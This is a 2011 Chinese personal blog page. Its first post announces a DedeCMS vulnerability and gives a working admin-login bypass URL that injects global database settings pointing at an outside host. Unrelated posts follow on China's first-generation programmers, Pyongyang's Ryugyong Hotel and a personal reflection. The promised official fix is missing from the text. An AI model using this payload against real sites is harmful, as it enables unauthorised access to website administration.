胡桥

众所周知，因使用简单、客户群多，织梦CMS一直被爆出许多漏洞。今天在群里得到织梦官方论坛某版主可靠消息：“DEDECMS爆严重安全漏洞，近期官方会发布相关补丁，望大家及时关注补丁动态。”
入侵步骤如下：http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面黑底黄字上的字母改为当前的验证码，即可直接进入网站后台。

稍微分析了一下，此漏洞的前提是必须得到后台路径才能实现，因此大家一定要养成使用DEDECMS建站时改后台名字的习惯。下面给出官方的解决办法：

解决办法：

2011: 08/12
CATEGORY: 网络
TAGS: dedecms最新安全漏洞
 dedecms最新漏洞
Write comment

中国第一代程序员时代终结

2011年7月，仅仅47岁的“中国第一程序员”求伯君彻底退隐江湖。这代表着一个时代的过去，在求伯君风光的年代，程序员身上充满着个人英雄主义的浪漫情怀。而随着时间的不断推移，单个程序员的能力显得越来越渺小，程序员逐渐沦为软件生产流水线上一颗螺丝钉，这让第一代程序员的神话再难重现。

过去的20年，是中国程序员快意恩仇的江湖时代，程序员通过知识实现梦想和财富。历数曾经的数字英雄，名利双收的并不多见。而程序、经营两手抓的更是凤毛麟角。

2011: 08/12
CATEGORY: 网络
TAGS: 中国第一代程序员
 中国第一代程序员列传
Write comment

传说中的朝鲜平壤105层柳京饭店

朝鲜105层柳京饭店

亮点：

自从1987年开工以来，几经拖延和停工，24年后终将完工

纪念金日成诞辰100周年

建成后将成全球最高饭店

韩专家称柳京饭店恐倒塌

曾被称为“世界最大烂尾楼”

2011: 08/12
CATEGORY: 生活
TAGS: 世界最高饭店
 全球最高酒店
 朝鲜平壤柳京饭店
Write comment

梨熟,叶落,乐随心动

又是八月, 还是那片梨园,还是那阵风,变得只是耳边的音乐.

想起去年那晚独自站在楼上，对自己许下一个誓言，想起到年底的落荒而逃, 如今，那个誓言还埋这片黑夜，今，是否能带它走出黎明?
Read more

2011: 08/11
CATEGORY: 生活
TAGS: 为梦想而奋斗
Write comment

Welcome to 胡桥'Blog!

淡泊以明志,宁静以致远!

探讨网络世界,闲聊人生百态!

岁月无声,静听小桥流水人家,连神都救不了我,唯独只有网络!

RSS FEED

网络之路漫漫其修远兮，吾将上下而求索！

php正则递归匹配

如何屏蔽优酷广告,屏蔽优酷视频广告方法

dedecms图集上传图片提示FILEID和302解决办法

经典还珠格格,新白娘子,伤不起啊

360与qq战争背后的真相

php 使用Curl、socket、file_get_contents三种方法模拟POST提交数据

dedecms5.x最新安全漏洞,get webshell 免账号密码直接进入后台

中国第一代程序员时代终结

传说中的朝鲜平壤105层柳京饭店

梨熟,叶落,乐随心动

Welcome to 胡桥'Blog!

Recent Comments

随机文章

Archive

Category

tags

友情链接